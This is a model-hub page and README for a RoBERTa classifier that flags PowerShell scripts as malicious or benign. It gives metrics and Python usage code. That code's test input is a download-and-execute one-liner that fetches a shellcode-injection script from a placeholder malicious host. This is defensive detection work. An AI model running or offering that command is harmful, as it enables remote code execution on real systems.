Downloads · 30 days
13
8% of all-time downloads
fetterm4n/finetuned-roberta-powershell-detector
finetuned-roberta-powershell-detector is a machine learning model from fetterm4n. Use it for the machine learning task on the model card, and read the license before you ship it in a product.
This model is a fine-tuned RoBERTa-base model for binary classification of PowerShell scripts. It predicts whether a given PowerShell command or script is malicious (1) or benign (0).
Downloads · 30 days
13
8% of all-time downloads
All-time downloads
155
Public
Parameters
125M
499 MB on disk
Likes
0
Public
Click a slice to open those files.
.safetensors499 MB · 99%
From the Hugging Face model README
This model is a fine-tuned RoBERTa-base model for binary classification of PowerShell scripts. It predicts whether a given PowerShell command or script is malicious (1) or benign (0).
roberta-base0 — Benign1 — Maliciousroberta-base tokenizerg5.4xlarge with A10G GPU| Metric | Value |
|---|---|
| Accuracy | ~98.7% |
| Eval Loss | ~0.089 |
| Final Train Loss | ~0.058 |
| Runtime per Epoch | ~2 mins |
from transformers import AutoTokenizer, AutoModelForSequenceClassification
import torch
tokenizer = AutoTokenizer.from_pretrained("YOUR_USERNAME/finetuned-roberta-powershell-detector")
model = AutoModelForSequenceClassification.from_pretrained("YOUR_USERNAME/finetuned-roberta-powershell-detector")
def classify_powershell(script):
inputs = tokenizer(script, return_tensors="pt", truncation=True, padding=True)
with torch.no_grad():
outputs = model(**inputs)
logits = outputs.logits
prediction = torch.argmax(logits, dim=1).item()
return "malicious" if prediction == 1 else "benign"
example = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/Invoke-Shellcode.ps1');"
print(classify_powershell(example))
This model is meant for PowerShell threat detection and research use in cybersecurity automation pipelines, such as:
MIT or Apache 2.0 (specify your license)